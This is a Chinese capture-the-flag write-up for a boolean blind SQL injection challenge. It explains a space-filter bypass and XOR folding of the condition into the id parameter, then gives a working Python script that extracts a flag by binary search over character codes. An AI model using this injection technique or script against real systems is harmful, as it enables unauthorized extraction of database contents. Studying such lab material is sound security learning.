题目
布尔盲注
过程
题目关了,没图。
1. 注入点很明显(id 参数),用 Burp 来 fuzz 一下,看一下哪些关键字被过滤了。
除此之外空格也被过滤了:用括号代替空格(如 select(flag)from(flag)),并用 ^ 异或把布尔条件并入 id 值——id=1^(条件)^1,条件为真时 id 仍为 1,响应中出现 YES;为假时 id 变为 0,YES 消失。据此对每个字符的 ASCII 码做二分,逐字符取出 flag。
import requests
import time
# Target base URL for the blind-injection oracle. The trailing "?" lets the
# payload below be appended directly as the raw query string.
host = "http://eci-2zef68uxg0ojmyl1cdog.cloudeci1.ichunqiu.com/" "?"
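def _bisect_char(oracle, pos, low=32, high=128):
    """Binary-search the ASCII code of the character at 1-based ``pos``.

    ``oracle(pos, mid)`` must return True exactly when the target character's
    code is strictly less than ``mid``. The search converges on ``low`` ==
    smallest ``mid`` for which the oracle is true, i.e. ``code + 1``.

    Returns the code, or None when it falls outside the printable range
    [32, 127). In MySQL ``substr`` past the end of the value yields ``''`` and
    ``ascii('') == 0``, so None also marks the end of the value; a byte >= 128
    never satisfies ``< 128``, collapses onto 127 and is rejected as well.
    """
    while low < high:
        mid = (low + high) // 2
        if oracle(pos, mid):
            high = mid
        else:
            low = mid + 1
    code = low - 1
    # 126 ('~') is printable and was wrongly treated as a terminator by the
    # original ``mid >= 127`` check; only 127 (DEL) and anything that
    # collapsed onto it end the dump.
    if code < 32 or code >= 127:
        return None
    return code


def dumpTable(query="select(flag)from(flag)", marker="YES", max_len=1000,
              timeout=10, base_url=None, fetch=None):
    """Recover a value via boolean-based blind SQL injection, one char at a time.

    The target filters spaces (and other tokens, per the write-up), so the
    payload avoids spaces with parentheses and folds the condition into the
    numeric ``id`` value with XOR::

        id=1^(ascii(substr((<query>),<pos>,1))<<mid>)^1

    When the comparison is true the expression is ``1^1^1 == 1`` and the
    normal ``id=1`` page (containing ``marker``) comes back; when false it is
    ``1^0^1 == 0`` and the marker is absent. Each character is located by
    binary search over that oracle (``_bisect_char``); the dump stops at the
    first position whose code is not printable ASCII, which is how the end of
    the value is detected.

    Args:
        query: Space-free sub-select whose result is extracted.
        marker: Substring whose presence in the body means "condition true".
            A flaky oracle (rate limiting, WAF/error pages that happen to
            contain it) silently corrupts the binary search.
        max_len: Exclusive upper bound on the 1-based position probed
            (``range(1, max_len)``, as in the original script).
        timeout: Per-request timeout in seconds for the default fetcher; the
            original had none and could hang forever on a stalled connection.
        base_url: Prefix the payload is appended to; defaults to the module
            global ``host``.
        fetch: ``callable(url) -> str`` returning the response body; defaults
            to ``requests.get(url, timeout=timeout).text``. Inject a fake here
            to exercise the logic offline.

    Returns:
        The recovered string. Progress is also printed after every character,
        exactly as the original script did.

    Raises:
        requests.RequestException: from the default fetcher on network or
            timeout errors. Failing loudly is preferable to retrying, since a
            wrong oracle answer cannot be detected from a single response.
    """
    global host  # retained from the original; reading a global needs no declaration
    base = host if base_url is None else base_url

    if fetch is None:
        def fetch(url):
            return requests.get(url, timeout=timeout).text

    def oracle(pos, mid):
        # True iff ascii(substr(query, pos, 1)) < mid on the target.
        payload = "id=1^(ascii(substr((%s),%d,1))<%d)^1" % (query, pos, mid)
        return marker in fetch(base + payload)

    ans = ""
    for pos in range(1, max_len):
        code = _bisect_char(oracle, pos)
        if code is None:
            break
        ans += chr(code)
        print("dumpTable is -> " + ans)
    return ans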
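if __name__ == "__main__":
    # Only fire requests when run as a script; importing this module (e.g. to
    # reuse dumpTable against another target) must not start the dump.
    dumpTable()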